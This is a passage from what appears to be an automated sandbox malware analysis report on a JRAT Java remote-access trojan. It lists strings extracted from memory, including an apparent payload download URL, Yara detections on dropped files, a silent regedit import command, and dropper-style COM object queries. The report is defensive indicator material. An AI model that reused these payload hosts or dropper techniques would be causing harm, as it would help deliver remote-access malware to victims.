        Source: xcopy.exe, 00000015.00000003.1741591994.00000000004E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://opensource.org/licenses/bsd-license.php
        Source: wscript.exe, 00000005.00000003.1667383984.0000000006E96000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.1656110679.0000000006E9F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.1661002252.0000000006894000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.1665048799.0000000006A73000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.1676383975.00000000005F3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://wshsoft.company/jv/jrex.zip
        Source: xcopy.exe, 00000015.00000003.1744919775.00000000004E0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1745013590.00000000004E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/
        Source: xcopy.exe, 00000015.00000003.1745226975.00000000004E0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1744919775.00000000004E0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1745013590.00000000004E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
        Source: xcopy.exe, 00000015.00000003.1728482839.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705197619.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703805489.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705497311.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1701984344.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1738221314.000000000277F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1734516541.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725756466.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705281833.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1726602349.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725315701.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703719180.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1733614981.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725508853.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1727080708.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1728367082.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1740826743.00000000004E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
        Source: xcopy.exe, 00000015.00000003.1744919775.00000000004E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ibm.com.
        Source: xcopy.exe, 00000015.00000003.1744919775.00000000004E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.lotus.com.
        Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/feature/use-service-mechanism
        Source: xcopy.exe, 00000015.00000003.1743343151.00000000004E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/goto/opensourcecode/request
        Source: java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/
        Source: javaw.exe, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/a/lang$
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/elementAttributeLimit
        Source: javaw.exe, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/elementAttributeLimitK
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityExpansionLimit
        Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityExpansionLimit(L
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityReplacementLimit
        Source: javaw.exe, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityReplacementLimit9
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/getEntityCountInfo
        Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/getEntityCountInfo:
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxElementDepth
        Source: javaw.exe, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxElementDepthche/xerC
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxGeneralEntitySizeLimit
        Source: javaw.exe, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxGeneralEntitySizeLimitutil/7
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxOccurLimit
        Source: javaw.exe, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxOccurLimit;E
        Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxParameterEntitySizeLimit
        Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxParameterEntitySizeLimitJ
        Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxXMLNameLimit
        Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxXMLNameLimit;T
        Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/totalEntitySizeLimit
        Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/totalEntitySizeLimitb
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/xmlSecurityPropertyManager
        Source: xcopy.exe, 00000015.00000003.1744919775.00000000004E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sun.com.
        Source: xcopy.exe, 00000015.00000003.1742677485.00000000004E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.torchmobile.com/
        Source: xcopy.exe, 00000015.00000003.1742677485.00000000004E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.torchmobile.com/)
        Source: xcopy.exe, 00000015.00000003.1741591994.00000000004E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.unicode.org/copyright.html
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/allow-dtd-events-after-endDTD
        Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/allow-dtd-events-after-endDTD=
        Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/eam;
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/external-general-entities
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/external-general-entitiesex
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/external-parameter-entities
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/namespace-prefixes
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/namespace-prefixesna(
        Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/namespace-prefixesrn(
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/namespaces
        Source: java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/namespaces&
        Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/namespacess
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/use-entity-resolver2
        Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/validation
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/properties/
        Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/properties/(
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/properties/nt(
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/properties/xml-string
        Source: xcopy.exe, 00000015.00000003.1743343151.00000000004E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://download.java.net/java/GA/jdk8u361/0ae14417abb444ebb02b9815e2103550/b09/ecc-8u-src.zip
        Source: xcopy.exe, 00000015.00000003.1741591994.00000000004E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/rober42539/lao-dictionary
        Source: xcopy.exe, 00000015.00000003.1741591994.00000000004E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/rober42539/lao-dictionary/LICENSE.txt
        Source: xcopy.exe, 00000015.00000003.1741591994.00000000004E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/rober42539/lao-dictionary/laodict.txt
        Source: java.exe, 00000007.00000002.2845228924.0000000005189000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://jrat.io
        Source: javaw.exe, 00000006.00000002.2845247996.0000000004C02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://jrat.ios
        Source: xcopy.exe, 00000015.00000003.1742230987.00000000004E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mozilla.org/MPL/2.0/.
        Source: xcopy.exe, 00000015.00000003.1741591994.00000000004E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sourceforge.net/project/?group_id=1519

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: C:\Users\user\AppData\Local\Temp\_0.337891030941391956323023258775833856.class, type: DROPPEDMatched rule: Detects JRAT malware Author: Florian Roth
        Source: C:\Users\user\AppData\Roaming\krmyqqmohp.txt, type: DROPPEDMatched rule: Detects JRAT malware Author: Florian Roth
        Uses regedit.exe to modify the Windows registry
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\regedit.exe regedit.exe /s C:\Users\user\AppData\Local\Temp\mNuEFMHNfs1412424943545557855.reg
        Windows Scripting host queries suspicious COM object (likely to drop second stage)
        Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeFile created: C:\Windows\SysWOW64\test.txtJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 6_2_029835186_2_02983518
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 6_2_029C6D506_2_029C6D50
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Windows6471774156078736222.dll A6BE5BE2D16A24430C795FAA7AB7CC7826ED24D6D4BC74AD33DA5C2ED0C793D0
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\Oracle\bin\API-MS-Win-core-xstate-l2-1-0.dll 8594D0EDA4E4367BC3473032552C5D0F9931C283E6C4CB8D7C1E7D9F61E13506
        Source: api-ms-win-core-sysinfo-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
        Source: api-ms-win-crt-locale-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
        Source: api-ms-win-core-synch-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
        Source: api-ms-win-core-localization-l1-2-0.dll.21.drStatic PE information: No import functions for PE file found
        Source: api-ms-win-core-synch-l1-2-0.dll.21.drStatic PE information: No import functions for PE file found
        Source: api-ms-win-core-timezone-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
        Source: api-ms-win-crt-convert-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
        Source: api-ms-win-core-memory-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
        Source: api-ms-win-core-file-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
        Source: api-ms-win-core-file-l1-2-0.dll.21.drStatic PE information: No import functions for PE file found
        Source: api-ms-win-core-console-l1-2-0.dll.21.drStatic PE information: No import functions for PE file found
        Source: api-ms-win-crt-private-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
        Source: api-ms-win-core-processthreads-l1-1-1.dll.21.drStatic PE information: No import functions for PE file found
        Source: api-ms-win-core-profile-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
        Source: api-ms-win-crt-utility-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
        Source: api-ms-win-core-heap-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
        Source: api-ms-win-core-console-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
        Source: api-ms-win-core-string-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
        Source: api-ms-win-crt-string-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
        Source: api-ms-win-crt-environment-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
        Source: api-ms-win-core-processthreads-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
        Source: api-ms-win-crt-process-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
        Source: API-MS-Win-core-xstate-l2-1-0.dll.21.drStatic PE information: No import functions for PE file found
